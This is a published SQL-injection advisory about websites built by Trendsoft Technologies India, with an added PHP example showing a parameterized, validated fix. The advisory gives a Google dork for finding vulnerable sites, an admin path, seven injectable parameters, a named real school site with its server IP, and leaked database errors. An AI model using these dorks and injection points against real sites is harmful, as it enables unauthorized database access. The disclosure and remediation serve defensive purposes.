
Trendsoft Technologies India SQL Injection Vulnerability

Author: KingSkrupellos, Published: 11-01-2019
# Exploit Title : Trendsoft Technologies India SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : trendsoft.info
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Designed & Maintained by Trendsoft Technologies''
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

############################################################

# Admin Panel Login Path :
***********************

/admin/

# SQL Injection Exploit :
*********************

/page_detail.php?sid=Njk=&pid=NTA=[SQL Injection]

/contact_us.php?sid=NQ==[SQL Injection]

/principal_message.php?sid=Mg==[SQL Injection]

/alumni_gallery.php?pid=MQ==[SQL Injection]

/kg_gallery.php?pid=MQ==[SQL Injection]

/video_gallery.php?pid=Ng==[SQL Injection]

/onlineapp/AdmFormfatima.php?id=[SQL Injection]

############################################################

# Example Vulnerable Site =>
**************************

Note => (103.92.235.205) => There are 7 domains hosted on this server.

[+] fatimaconventschool.com/page_detail.php?sid=Njk=&pid=NTA=1%27

[Proof of Concept ] => archive.fo/0S8I0

############################################################

# SQL Database Error :
*********************

cannot execute query select staticId,parentId,staticTitle,externalLink from
tbl_fatima_static_pages where enable='Activate' and parentId=505 order by
orderOfAppearance ascYou have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right
syntax to use near order by orderOfAppearance asc' at line 1

select * from adminsetup where class=
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near '' at line 1
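The two error messages above show the failure pattern behind this advisory: the application decodes a base64 query parameter, concatenates the result straight into the SQL text, and echoes the failed query (with the driver error) back to the client. The following is an added example of how the `page_detail.php` style handler would be written to close that hole; it is not Trendsoft's code or a reconstruction of it. It assumes an open `mysqli` connection in `$db`, reuses the table and column names visible in the leaked query, and treats the `pid` entry point and the `decodeIdParam` / `fetchStaticPages` helper names as hypothetical.

```php
<?php
// Added example, not the vendor's code. Hardened handler for a base64-encoded
// integer id such as the ?sid= / ?pid= parameters listed in this advisory.
// Assumes: $db is a connected mysqli instance; table/column names come from the
// query shown in the "SQL Database Error" section; function names are hypothetical.

declare(strict_types=1);

/**
 * Decode a base64-encoded id parameter and require it to be a positive integer.
 * Strict decoding rejects any character outside the base64 alphabet (a lenient
 * decode silently skips such characters), and the integer check rejects any
 * decoded value that is not a plain number. Returns null when the parameter is
 * missing or malformed so the caller can answer with a 400 instead of a query.
 */
function decodeIdParam(?string $raw): ?int
{
    if ($raw === null) {
        return null;
    }
    $decoded = base64_decode($raw, true);   // strict mode: false on invalid input
    if ($decoded === false || !preg_match('/^[1-9][0-9]{0,9}$/', $decoded)) {
        return null;
    }
    return (int) $decoded;
}

/**
 * Fetch the active static pages under a parent id using a prepared statement.
 * The id travels as a bound integer, never as part of the SQL string, so the
 * query shape is fixed regardless of what the client sent.
 */
function fetchStaticPages(mysqli $db, int $parentId): array
{
    $sql = 'SELECT staticId, parentId, staticTitle, externalLink '
         . 'FROM tbl_fatima_static_pages '
         . 'WHERE enable = ? AND parentId = ? '
         . 'ORDER BY orderOfAppearance ASC';
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        // Log the driver error server-side only. Echoing $db->error together
        // with the query text is how the SQL on this page leaked to the client.
        error_log('prepare failed: ' . $db->error);
        throw new RuntimeException('database error');
    }
    $enable = 'Activate';
    $stmt->bind_param('si', $enable, $parentId);   // 's' string, 'i' integer
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Hypothetical entry point mirroring page_detail.php?pid=...
$pid = decodeIdParam($_GET['pid'] ?? null);
if ($pid === null) {
    http_response_code(400);
    exit('invalid page id');
}
$pages = fetchStaticPages($db, $pid);
```

Three properties make this version resistant to the reported issue: strict base64 decoding, an integer whitelist on the decoded value, and a parameterized query, with the generic error response ensuring that even a genuine database fault never reveals the statement text or table names to the requester.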

############################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
